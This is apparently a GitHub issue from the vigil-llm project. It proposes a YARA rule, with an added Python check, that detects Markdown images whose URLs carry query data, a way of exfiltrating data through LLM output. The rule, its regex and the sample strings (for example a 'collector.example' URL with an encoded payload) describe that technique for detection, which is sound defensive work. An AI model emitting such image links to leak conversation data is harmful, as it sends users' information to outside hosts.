deadbits / vigil-llm

⚡ Vigil ⚡ Detect prompt injections, jailbreaks, and other potentially risky Large Language Model (LLM) inputs
https://vigil.deadbits.ai/
Apache License 2.0

YARA rule for Markdown exfiltration #23

Closed deadbits closed 1 year ago

deadbits commented 1 year ago
rule MarkdownExfiltration
{
    meta:
        category = "Data Exfiltration"
        description = "Detects Markdown image with query parameters used during data exfiltration"
        author = "Adam M. Swanda"
        references = "https://embracethered.com/blog/posts/2023/bing-chat-data-exfiltration-poc-and-fix/"

    strings:
        // Forward slashes are escaped because "/" delimits a YARA regex
        $md = /\!\[.+\]\(https?:\/\/[a-z\.]+\/logo\.png\?q=.+\)/
    condition:
        $md
}

something like that but better regex

deadbits commented 1 year ago

https://github.com/deadbits/vigil-llm/blob/main/data/yara/mdexfil.yar
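
Added example, not part of the issue and not Vigil's own code: the check the rule in the first comment describes, written in Python and generalized to any host, path and query parameter name, with empty alt text allowed. The function name, the `allowed_hosts` parameter and the sample strings are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Inline Markdown image: ![alt](url) or ![alt](url "title"); alt text may be empty.
# URLs containing a literal ")" are not matched by this pattern.
MD_IMAGE = re.compile(
    r'!\[[^\]]*\]\(\s*<?(https?://[^\s)>]+)>?(?:\s+"[^"]*")?\s*\)',
    re.IGNORECASE,
)


def find_markdown_exfil(text, allowed_hosts=frozenset()):
    """Return one finding per Markdown image whose remote URL carries query data.

    allowed_hosts is a hypothetical allowlist of image hosts the deployment trusts.
    """
    findings = []
    for m in MD_IMAGE.finditer(text):
        url = urlsplit(m.group(1))
        host = (url.hostname or "").lower()
        if host in allowed_hosts:
            continue
        # Decoded (name, value) pairs; parameters with blank values are dropped.
        params = parse_qsl(url.query)
        if params:
            findings.append({
                "host": host,
                "path": url.path,
                "params": params,
                "match": m.group(0),
            })
    return findings


# Constructed sample model outputs (not taken from the issue).
SAMPLES = {
    "rule_shape": "Logo: ![logo](https://collector.example/logo.png?q=my%20secret%20notes)",
    "no_query": "![diagram](https://docs.example/img/arch.png)",
    "empty_alt": "![](HTTPS://Cdn.Example/p.gif?d=aGVsbG8=&v=2)",
    "plain_link": "[link](https://site.example/?q=x)",
    "badge": "![badge](https://img.shields.example/b.svg?label=ci)",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, find_markdown_exfil(text))
```

The `empty_alt` sample has no alt text, an upper-case host and a path other than `logo.png`, so the regex in the rule above does not match it while this check does.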